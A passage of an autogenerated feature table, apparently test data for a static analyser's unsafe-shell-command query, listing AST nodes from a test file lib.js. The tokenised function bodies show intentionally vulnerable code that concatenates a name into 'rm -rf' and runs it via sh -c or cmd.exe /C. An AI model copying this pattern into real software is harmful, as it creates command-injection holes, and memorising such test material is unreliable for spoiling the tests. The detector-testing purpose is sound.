| (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:9 | cp.spawn | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:9 | cp.spawn | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:9 | cp.spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | exceptional return of cp.spaw ... gs, cb) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | exceptional return of cp.spaw ... gs, cb) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | exceptional return of cp.spaw ... gs, cb) | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | exceptional return of cp.spaw ... gs, cb) | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | exceptional return of cp.spaw ... gs, cb) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:5:152:9 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:5:152:9 | spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:5:152:9 | spawn | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:5:152:9 | spawn | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:5:152:9 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:11:152:12 | sh | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:11:152:12 | sh | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:11:152:12 | sh | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:11:152:12 | sh | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:11:152:12 | sh | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:11:152:12 | sh | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:11:152:12 | sh | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:11:152:12 | sh | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:11:152:12 | sh | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:15:152:18 | args | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:15:152:18 | args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:15:152:18 | args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:15:152:18 | args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:15:152:18 | args | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:15:152:18 | args | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:15:152:18 | args | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:15:152:18 | args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:15:152:18 | args | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:21:152:22 | cb | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:21:152:22 | cb | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:21:152:22 | cb | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:21:152:22 | cb | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:21:152:22 | cb | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:21:152:22 | cb | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:21:152:22 | cb | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:21:152:22 | cb | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:21:152:22 | cb | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:155:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:155:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:155:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:155:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:155:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:155:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:155:24 | module. ... direct2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:155:24 | module. ... direct2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:155:24 | module. ... direct2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:168:1 | module. ... }\\n\\t);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:168:1 | module. ... }\\n\\t);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:1:168:1 | module. ... }\\n\\t);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:8:155:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:8:155:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:8:155:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:16:155:24 | indirect2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:16:155:24 | indirect2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:16:155:24 | indirect2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | cp | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | cp | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | this | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | this | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:155:27 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| 